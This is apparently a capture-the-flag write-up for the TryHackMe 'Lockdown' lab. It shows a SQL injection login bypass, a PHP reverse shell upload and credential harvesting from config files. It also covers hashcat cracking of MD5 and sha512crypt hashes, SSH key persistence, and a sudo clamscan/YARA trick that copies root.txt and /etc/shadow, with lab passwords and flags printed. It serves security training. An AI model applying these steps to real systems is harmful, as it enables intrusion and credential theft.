Lockdown (SQLI, FileUpload, Cracking, Yara)

First, we need to enumerate using nmap.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/lockdown  
╰─➤  nmap -A 10.10.38.137 | tee nmap.log
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-25 20:33 +0630
Nmap scan report for 10.10.38.137
Host is up (0.30s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 27:1d:c5:8a:0b:bc:02:c0:f0:f1:f5:5a:d1:ff:a4:63 (RSA)
|   256 ce:f7:60:29:52:4f:65:b1:20:02:0a:2d:07:40:fd:bf (ECDSA)
|_  256 a5:b5:5a:40:13:b0:0f:b6:5a:5f:21:60:71:6f:45:2e (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Coronavirus Contact Tracer
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.95 seconds

Port 80

You will see error. You must be attach ip and domain in /etc/hosts file. After finished, you will see dashboard.

When you click Go to Admin Panel, it will redirect to http://contacttracer.thm/admin/login.php. You can easily bypass using sqli admin' or '1'='1. After this, you will find admin dashboard.

We will create new people with shell.php picture.

And again and again, we try it but no luck. Let's enumerate with gobuster. You will see uploads with 200 status. But noluck.

Let's check http://contacttracer.thm/admin/?page=system_info. Upload a php reverse shell file. Logout and check http://contacttracer.thm/login.php. In netcat session, we got a reverse shell.

User

In /var/www/html, you will found a file called config.php.

sh-4.4$ cat config.php
cat config.php
<?php
session_start();
$dev_data = array('id'=>'-1','firstname'=>'Developer','lastname'=>'','username'=>'dev_oretnom','password'=>'5da283a2d990e8d8512cf967df5bc0d0','last_login'=>'','date_updated'=>'','date_added'=>'');
if(!defined('base_url')) define('base_url','http://contacttracer.thm/');
if(!defined('base_app')) define('base_app', str_replace('\\','/',__DIR__).'/' );
if(!defined('dev_data')) define('dev_data',$dev_data);
require_once('classes/DBConnection.php');
require_once('classes/SystemSettings.php');
$db = new DBConnection;
$conn = $db->conn;

function redirect($url=''){
	if(!empty($url))
	echo '<script>location.href="'.base_url .$url.'"</script>';
}
function validate_image($file){
	if(!empty($file)){
		if(@getimagesize(base_url.$file)){
			return base_url.$file;
		}else{
			return base_url.'dist/img/no-image-available.png';
		}
	}else{
		return base_url.'dist/img/no-image-available.png';
	}
}

Check classes/DBConnection.php.

<?php
class DBConnection{

    private $host = 'localhost';
    private $username = 'cts';
    private $password = 'YOUMKtIXoRjFgMqDJ3WR799tvq2UdNWE';
    private $database = 'cts_db';
    
    public $conn;
    
    public function __construct(){

        if (!isset($this->conn)) {
            
            $this->conn = new mysqli($this->host, $this->username, $this->password, $this->database);
            
            if (!$this->conn) {
                echo 'Cannot connect to database server';
                exit;
            }            
        }    
        
    }
    public function __destruct(){
        $this->conn->close();
    }
}

You can connect mysql using this credential.

sh-4.4$ /usr/bin/python3 -c 'import pty; pty.spawn("/bin/sh")'
sh-4.4$ mysql -ucts -p
Enter password: YOUMKtIXoRjFgMqDJ3WR799tvq2UdNWE

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 6879
Server version: 5.7.35-0ubuntu0.18.04.1 (Ubuntu)

Copyright (c) 2000, 2021, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> 

Enumerate the database.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| cts_db             |
+--------------------+
2 rows in set (0.00 sec)

mysql> use cts_db;
use cts_db;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+------------------+
| Tables_in_cts_db |
+------------------+
| barangay_list    |
| city_list        |
| establishment    |
| people           |
| state_list       |
| system_info      |
| tracks           |
| users            |
+------------------+
8 rows in set (0.00 sec)

mysql> select * from users;
select * from users;
+----+--------------+----------+----------+----------------------------------+-------------------------------+------------+---------------------+---------------------+
| id | firstname    | lastname | username | password                         | avatar                        | last_login | date_added          | date_updated        |
+----+--------------+----------+----------+----------------------------------+-------------------------------+------------+---------------------+---------------------+
|  1 | Adminstrator | Admin    | admin    | 3eba6f73c19818c36ba8fea761a3ce6d | uploads/1614302940_avatar.jpg | NULL       | 2021-01-20 14:02:37 | 2021-02-26 10:23:23 |
+----+--------------+----------+----------+----------------------------------+-------------------------------+------------+---------------------+---------------------+
1 row in set (0.00 sec)

mysql> 

You will find admin hash on this databases. Let's crack this.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/lockdown  
╰─➤  hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt --force
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i5-7200U CPU @ 2.50GHz, 2048/5579 MB allocatable, 4MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=3 -D DGST_R2=2 -D DGST_R3=1 -D DGST_ELEM=4 -D KERN_TYPE=0 -D _unroll'
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

3eba6f73c19818c36ba8fea761a3ce6d:sweetpandemonium
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Type........: MD5
Hash.Target......: 3eba6f73c19818c36ba8fea761a3ce6d
Time.Started.....: Tue Apr 26 20:35:21 2022 (2 secs)
Time.Estimated...: Tue Apr 26 20:35:23 2022 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2804.1 kH/s (0.33ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 1249280/14344384 (8.71%)
Rejected.........: 0/1249280 (0.00%)
Restore.Point....: 1245184/14344384 (8.68%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: swethan -> supergirl2006

Started: Tue Apr 26 20:35:16 2022
Stopped: Tue Apr 26 20:35:25 2022

Switch to cyrus user using cracked password.

sh-4.4$ su cyrus 
su cyrus
Password: sweetpandemonium

cyrus@lockdown:/$ whoami
whoami
cyrus
cyrus@lockdown:/$ ls    
ls
bin    dev   initrd.img      lib64       mnt   root  snap      sys  var
boot   etc   initrd.img.old  lost+found  opt   run   srv       tmp  vmlinuz
cdrom  home  lib             media       proc  sbin  swap.img  usr  vmlinuz.old
cyrus@lockdown:/$ cd /home/cyrus
cd /home/cyrus
cyrus@lockdown:~$ cat user.txt
cat user.txt
THM{w4c1F5AuUNhHCJRtiGtRqZyp0QJDIbWS}
cyrus@lockdown:~$

Root

Assign ssh key and login to ssh using our own private key.

echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHmsE/qACwaksUEoBvDE4wFu0/N5eZeNQEX9upOp8Bh4KTZsUcMqo7OSdztZbvkSwwp0S6C3mk9WLioJbQ2dDFC64ZyT/LUAgNZgZkSRZtufQa9lhUgqNYhg/0oT1juH5rGTJhoGa8MROpRhp/LiKXw8g4wOQggrG+xqrnCG84PCcb0bq73XW7XMYN9koLXokwl3GSlX/AkSn3VWgBcnj73IX2eI2yvYSAzckYyWeu9fR6EX/j8Rfj3Z7Tsy0W4iuhHwSGPJHX8yDms9Sx07nQmMGGKW+RmQ6p1dqDt9g/R1L2aXDJLJnZOGzR4ZqdxFpyl3R/R026HXKyeSCSAvaE34GIzBowe6g9K4h/Ewe3zwIBlLW8TGq7L7EBPR2j6d2yYSbniH3GMio88N+vmF4E919gMMlgMqi4fJOhoy/l++4vuBqKAEpGEcywblNLw4YSe59dSBurrFeTNrC3O6CNyO8GyDtQ3wxNOGI7nMe7yOesabNTdz9qDRXdbpyXDwE= hnl@hnl' >> /home/cyrus/.ssh/authorized_keys 

Login ssh from our machine.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/lockdown  
╰─➤  ssh -i id_rsa cyrus@10.10.38.137
cyrus@lockdown:~$ 

When you check privileges, you will find /opt/scan/scan.sh can run with root privileges.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/lockdown  
╰─➤  ssh -i id_rsa cyrus@10.10.38.137
cyrus@lockdown:~$ sudo -l
[sudo] password for cyrus: 
Matching Defaults entries for cyrus on lockdown:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User cyrus may run the following commands on lockdown:
    (root) /opt/scan/scan.sh

Check file contents and permissions.

cyrus@lockdown:~$ cat /opt/scan/scan.sh
#!/bin/bash

read -p "Enter path: " TARGET

if [[ -e "$TARGET" && -r "$TARGET" ]]
  then
    /usr/bin/clamscan "$TARGET" --copy=/home/cyrus/quarantine
    /bin/chown -R cyrus:cyrus /home/cyrus/quarantine
  else
    echo "Invalid or inaccessible path."
fi
cyrus@lockdown:~$ ls -al /opt/scan/scan.sh
-rwxr-xr-x 1 root root 255 May 11  2021 /opt/scan/scan.sh

You can see clamav configuration file at /etc/clamav/freshclam.conf.

cyrus@lockdown:~$ cat /etc/clamav/freshclam.conf 
# Automatically created by the clamav-freshclam postinst
# Comments will get lost when you reconfigure the clamav-freshclam package

DatabaseOwner clamav
UpdateLogFile /var/log/clamav/freshclam.log
LogVerbose false
LogSyslog false
LogFacility LOG_LOCAL6
LogFileMaxSize 0
LogRotate true
LogTime true
Foreground false
Debug false
MaxAttempts 5
DatabaseDirectory /var/lib/clamav
DNSDatabaseInfo current.cvd.clamav.net
ConnectTimeout 30
ReceiveTimeout 30
TestDatabases yes
ScriptedUpdates yes
CompressLocalDatabase no
SafeBrowsing false
Bytecode true
NotifyClamd /etc/clamav/clamd.conf
# Check for new database 24 times a day
Checks 24
DatabaseMirror db.local.clamav.net
DatabaseMirror database.clamav.net

Database directory is /var/lib/clamav. Let's check this.

cyrus@lockdown:~$ ls -al /var/lib/clamav
total 16
drwxrwxrwx  2 clamav clamav 4096 Apr 26 14:03 .
drwxr-xr-x 45 root   root   4096 Jul 30  2021 ..
-rw-r--r--  1 root   root     46 Jul 23  2021 main.hdb
-rw-r--r--  1 root   root     69 May 11  2021 mirrors.dat

We can create our own yara rule file to check the string root and THM.

cyrus@lockdown:/var/lib/clamav$ cat rule.yar 
rule PWNED
{
  strings:
    $a = "root"
    $b = "THM"
    
  condition:
    $b or $a
}

And then run it.

cyrus@lockdown:/var/lib/clamav$ sudo -l
Matching Defaults entries for cyrus on lockdown:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User cyrus may run the following commands on lockdown:
    (root) /opt/scan/scan.sh
cyrus@lockdown:/var/lib/clamav$ sudo /opt/scan/scan.sh
Enter path: /root/root.txt
/root/root.txt: YARA.PWNED.UNOFFICIAL FOUND
/root/root.txt: copied to '/home/cyrus/quarantine/root.txt'

----------- SCAN SUMMARY -----------
Known viruses: 2
Engine version: 0.103.2
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.00 MB
Data read: 0.00 MB (ratio 0.00:1)
Time: 0.111 sec (0 m 0 s)
Start Date: 2022:04:26 14:24:06
End Date:   2022:04:26 14:24:06

Finally we can read the root flag.

cyrus@lockdown:/var/lib/clamav$ cat /home/cyrus/quarantine/root.txt
THM{IQ23Em4VGX91cvxsIzatpUvrW9GZZJxm}

Root (Shadow)

Create yara rule file with is check shadow file.

cyrus@lockdown:/var/lib/clamav$ cat rule.yar 
rule PWNED
{
  strings:
    $a = "root"
    $b = "shadow"
    
  condition:
    $b or $a
}

Run this clamav.

cyrus@lockdown:/var/lib/clamav$ sudo /opt/scan/scan.sh
Enter path: /etc/shadow
/etc/shadow: YARA.PWNED.UNOFFICIAL FOUND
/etc/shadow: copied to '/home/cyrus/quarantine/shadow'

----------- SCAN SUMMARY -----------
Known viruses: 2
Engine version: 0.103.2
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.00 MB
Data read: 0.00 MB (ratio 0.00:1)
Time: 0.007 sec (0 m 0 s)
Start Date: 2022:04:26 14:26:55
End Date:   2022:04:26 14:26:55

Here is the shadow file of root.

cyrus@lockdown:/var/lib/clamav$ cat /home/cyrus/quarantine/shadow
root:*:18480:0:99999:7:::
daemon:*:18480:0:99999:7:::
bin:*:18480:0:99999:7:::
sys:*:18480:0:99999:7:::
sync:*:18480:0:99999:7:::
games:*:18480:0:99999:7:::
man:*:18480:0:99999:7:::
lp:*:18480:0:99999:7:::
mail:*:18480:0:99999:7:::
news:*:18480:0:99999:7:::
uucp:*:18480:0:99999:7:::
proxy:*:18480:0:99999:7:::
www-data:*:18480:0:99999:7:::
backup:*:18480:0:99999:7:::
list:*:18480:0:99999:7:::
irc:*:18480:0:99999:7:::
gnats:*:18480:0:99999:7:::
nobody:*:18480:0:99999:7:::
systemd-network:*:18480:0:99999:7:::
systemd-resolve:*:18480:0:99999:7:::
syslog:*:18480:0:99999:7:::
messagebus:*:18480:0:99999:7:::
_apt:*:18480:0:99999:7:::
lxd:*:18480:0:99999:7:::
uuidd:*:18480:0:99999:7:::
dnsmasq:*:18480:0:99999:7:::
landscape:*:18480:0:99999:7:::
pollinate:*:18480:0:99999:7:::
sshd:*:18757:0:99999:7:::
maxine:$6$/syu6s6/$Z5j6C61vrwzvXmFsvMRzwNYHO71NSQgm/z4cWQpDxMt3JEpT9FvnWm4Nuy.xE3xCQHzY3q9Q4lxXLJyR1mt320:18838:0:99999:7:::
cyrus:$6$YWzR.V19JxyENT/D$KuSzWbb6V0iXfIcA/88Buum92Fr5lBu6r.kMoQYAdfvbJuHjO7i7wodoahlZAYfFhIuymOaEWxGlo0WkhbqaI1:18757:0:99999:7:::
mysql:!:18758:0:99999:7:::
clamav:!:18758:0:99999:7:::

Crack maxine password using hashcat.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/lockdown  
╰─➤  cat hash01.txt 
maxine:$6$/syu6s6/$Z5j6C61vrwzvXmFsvMRzwNYHO71NSQgm/z4cWQpDxMt3JEpT9FvnWm4Nuy.xE3xCQHzY3q9Q4lxXLJyR1mt320:18838:0:99999:7:::
╭─hnl@hnl ~/Desktop/ctf/tryhackme/lockdown  
╰─➤  hashcat -m 1800 hash01.txt /usr/share/wordlists/rockyou.txt --force
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i5-7200U CPU @ 2.50GHz, 2048/5579 MB allocatable, 4MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt
* Uses-64-Bit

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=16 -D KERN_TYPE=1800 -D _unroll'
* Device #1: Kernel m01800-pure.c39d53d7.kernel not found in cache! Building may take a while...
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

$6$/syu6s6/$Z5j6C61vrwzvXmFsvMRzwNYHO71NSQgm/z4cWQpDxMt3JEpT9FvnWm4Nuy.xE3xCQHzY3q9Q4lxXLJyR1mt320:tiarna
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Type........: sha512crypt $6$, SHA512 (Unix)
Hash.Target......: $6$/syu6s6/$Z5j6C61vrwzvXmFsvMRzwNYHO71NSQgm/z4cWQp...1mt320
Time.Started.....: Tue Apr 26 21:00:55 2022 (1 min, 46 secs)
Time.Estimated...: Tue Apr 26 21:02:41 2022 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      764 H/s (8.32ms) @ Accel:256 Loops:32 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 80896/14344384 (0.56%)
Rejected.........: 0/80896 (0.00%)
Restore.Point....: 79872/14344384 (0.56%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4992-5000
Candidates.#1....: Brendan -> skyla1

Started: Tue Apr 26 21:00:34 2022
Stopped: Tue Apr 26 21:02:42 2022

Switch to maxine user and check privileges. Finally, we got root access.

cyrus@lockdown:/var/lib/clamav$ su maxine
Password: 
maxine@lockdown:/var/lib/clamav$ sudo -l
[sudo] password for maxine: 
Matching Defaults entries for maxine on lockdown:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User maxine may run the following commands on lockdown:
    (ALL : ALL) ALL
maxine@lockdown:/var/lib/clamav$ sudo -s
root@lockdown:/var/lib/clamav# whoami
root
root@lockdown:/var/lib/clamav#